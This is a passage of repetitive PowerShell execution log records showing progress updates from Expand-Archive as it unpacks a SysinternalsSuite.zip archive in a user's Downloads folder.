-RECORD 41----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 42----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="288"
 
-RECORD 43----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="94"
                                                                                                                                                                                                                                                                 
-RECORD 44----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="287"
 
-RECORD 45----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 46----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="286"
 
-RECORD 47----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 48----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="285"
 
-RECORD 49----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="93"
                                                                                                                                                                                                                                                                 
-RECORD 50----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="284"
 
-RECORD 51----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 52----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="283"
 
-RECORD 53----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 54----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="282"
 
-RECORD 55----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="92"
                                                                                                                                                                                                                                                                 
-RECORD 56----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="281"
 
-RECORD 57----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 58----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="280"
 
-RECORD 59----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 60----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="279"
 
-RECORD 61----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="91"
                                                                                                                                                                                                                                                                 
-RECORD 62----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="278"
 
-RECORD 63----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 64----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="277"
 
-RECORD 65----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 66----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="276"
 
-RECORD 67----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="90"
                                                                                                                                                                                                                                                                 
-RECORD 68----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="275"
 
-RECORD 69----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 70----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="274"
 
-RECORD 71----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 72----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="273"
 
-RECORD 73----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="89"
                                                                                                                                                                                                                                                                 
-RECORD 74----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="272"
 
-RECORD 75----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 76----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="271"
 
-RECORD 77----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 78----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="270"
 
-RECORD 79----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="88"
                                                                                                                                                                                                                                                                 
-RECORD 80----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="269"
 
-RECORD 81----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 82----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(ProgressBarHelper): name="previousSegmentWeight"; value="0"
ParameterBinding(ProgressBarHelper): name="currentSegmentWeight"; value="100"
ParameterBinding(ProgressBarHelper): name="totalNumberofEntries"; value="308"
ParameterBinding(ProgressBarHelper): name="currentEntryCount"; value="268"
 
-RECORD 83----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(Write-Progress): "Write-Progress"
ParameterBinding(Write-Progress): name="Activity"; value="Expand-Archive"
ParameterBinding(Write-Progress): name="Status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
ParameterBinding(Write-Progress): name="PercentComplete"; value="87"
                                                                                                                                                                                                                                                                 
-RECORD 84----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Payload | CommandInvocation(ProgressBarHelper): "ProgressBarHelper"
ParameterBinding(ProgressBarHelper): name="cmdletName"; value="Expand-Archive"
ParameterBinding(ProgressBarHelper): name="status"; value="The archive file 'C:\Users\pbeesly\Downloads\SysinternalsSuite.zip' expansion is in progress..."
